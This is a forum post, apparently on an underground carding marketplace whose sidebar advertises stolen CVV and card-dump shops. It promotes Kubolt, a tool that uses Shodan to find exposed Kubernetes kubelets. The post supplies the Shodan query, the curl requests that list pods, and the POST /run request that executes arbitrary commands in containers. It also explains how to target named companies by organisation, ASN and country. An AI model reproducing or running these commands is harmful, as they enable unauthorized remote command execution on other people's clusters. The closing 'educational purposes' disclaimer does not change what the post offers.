Welcome!

By registering with us, you'll be able to discuss, share and private message with other members of our community.

SignUp Now!
banner Expire 25 April 2025
adv ex on 5 january 2024
adv ex on 22 February 2024
Banner expire 20 November 2024
Kfc Club

Patrick Stash
casino
banner expire at 13 August 2024
BidenCash Shop
Rescator cvv and dump shop
Yale lodge shop
UniCvv

Premiums

TRUSTED VENDOR
Joined
Dec 5, 2020
Messages
2,334






Kubolt is a simple utility for scanning public unauthinticated kubernetes clusters and run commands inside containers.

Why?
Sometimes, the kubelet port 10250 is open to unauthorized access and makes it possible to run commands inside the containersusing getrun function from kubelet:

Code:
// getRun handles requests to run a command inside a container.
func (s *Server) getRun(request *restful.Request, response *restful.Response) {
params := getExecRequestParams(request)
pod, ok := s.host.GetPodByName(params.podNamespace, params.podName)
if !ok {
response.WriteError(http.StatusNotFound, fmt.Errorf("pod does not exist"))
return
}
Click to expand...
Click to expand...
How?
Okay, let's ask our friend Shodan
The basic query is

ssl:true port:10250 404
Kubelet uses port 10250 with SSL by default, 404 is the HTTP response without URL path.
Kubolt asks Shodan by API for list of IP addresses and keeps them for other OSINT actions
Firstly, let's ask Kubelet for running pods and filter hosts where response doesn't contain Unauthorized and contains containerso we can run command inside it.

Code:
curl -k https://IP-from-Shodan:10250/runningpods/
https://IP-from-Shodan:10250/runningpods/

Anyway, if you find the host without any running pods at the time, keep it for next time when pods might be started 
You can list all available pods from these requests:

Code:
curl -k https://IP-from-Shodan:10250/pods/
https://IP-from-Shodan:10250/pods/

#or

Code:
curl http://IP-from-Shodan:10255/pods/
Next kubolt parse response and generate a new request as below:
Code:
curl -XPOST -k https://IP-from-Shodan:10250/run/<namespace>/<PodName>/<containerName> -d "cmd=<command-to-run>"
You can target companies more accurate using Shodan filters such as:


  • asn
  • org
  • country
  • net
Install

Code:
mkdir output
pip install -r requirements.txt
Run

Code:
python kubolt.py --query "asn:123123 org:'ACME Corporation'"
#or

Code:
python kubolt.py --query "org:'ACME Corporation' country:UK"
Shodan
Kubolt uses Shodan API and Query Credits accordingly, if you run the tool without query filters then you will probably fire all your credits
Important
The Tool provided by the author should only be used for educational purposes. The author can not be held responsible for the misuse of the Tool. The author is not responsible for any direct or indirect damage caused due to the usage of the Tool.
 
Top Bottom